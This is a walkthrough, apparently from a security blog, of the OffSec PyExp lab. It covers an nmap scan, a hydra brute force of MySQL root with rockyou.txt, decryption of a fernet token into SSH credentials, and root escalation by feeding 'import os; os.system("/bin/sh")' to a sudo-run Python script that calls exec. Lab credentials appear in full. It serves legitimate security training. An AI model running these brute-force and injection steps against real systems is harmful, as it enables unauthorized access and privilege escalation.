offsec

PyExp OffSec Walkthrough

INFOXIDE
2 Min Read
PyExp OffSec Walkthrough

PyExp OffSec Walkthrough: PyExp is an OffSec (Offensive Security) lab designed to test your skills in exploiting Python-based applications and privilege escalation. This lab emphasizes understanding Python vulnerabilities and leveraging misconfigurations to gain system access.

Nmap

sudo nmap 192.168.75.118 -p- -sS -sV                

PORT     STATE SERVICE VERSION
1337/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
3306/tcp open  mysql   MySQL 5.5.5-10.3.23-MariaDB-0+deb10u1
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

With only SSH and MySQL open we can start bruteforcing MySQL. As the root account generally always exists we can start by bruteforcing this using the rockyou.txt wordlist.Copy

hydra -l root -P /usr/share/wordlists/rockyou.txt mysql://192.168.75.118
mysql cracking

With the valid credentials of root:prettywoman we can now login to MySQL.Copy

mysql -u root -p -h 192.168.75.118
mysql

Viewing available databases we find the database ‘data’ which contains a table called ‘fernet’. This table contains a token and key as shown below.

value

The values are:Copy

cred

gAAAAABfMbX0bqWJTTdHKUYYG9U5Y6JGCpgEiLqmYIVlWB7t8gvsuayfhLOO_cHnJQF1_ibv14si1MbL7Dgt9Odk8mKHAXLhyHZplax0v02MMzh_z_eI7ys= 

keyy

UJ5_V_b-TWKKyzlErA96f-9aEnQEfdjFbRKt8ULjdV0=

I tried decoding these with base64 and a few others. No luck with any legible output. Researching the words fernet and encode give us the following result: https://asecuritysite.com/encryption/ferdecode

Entering the details we have found give the results below.

fernet encoder and decoder

These credentials returned are: lucy:wJ9`"Lemdv9[FEw- Which allow us to login with SSH as the user lucy.Copy

ssh -p 1337 lucy@192.168.75.118
ssh

Checking sudo permissions with sudo -l shows we can run /usr/bin/python2 /opt/exp.py as root without specifying a password.

sudo -l

Reading the contents of /opt/exp.py:Copy

uinput = raw_input('how are you?')
exec(uinput)

Looks like this script will ask us a question which prompts raw input. If we can escape the shell whilst the script is active we should be able to maintain escalated privileges. Use the command below to escape the shell when prompted for input.Copy

import os; os.system("/bin/sh")
root flag

Finally this lab solve now see you on next lab 😉

Also Read | Sunset Midnight Offsec Walkthrough

TAGGED:
Share This Article
Previous Article Sunset Midnight Offsec Walkthrough Sunset Midnight Offsec Walkthrough
Next Article Ha-Natraj OffSec Walkthruogh Ha-Natraj OffSec Walkthruogh
Infoxide Security Live Hacking Workshop
Infoxide Security Certifications
infoxide Security telegram channel

Trending News🔥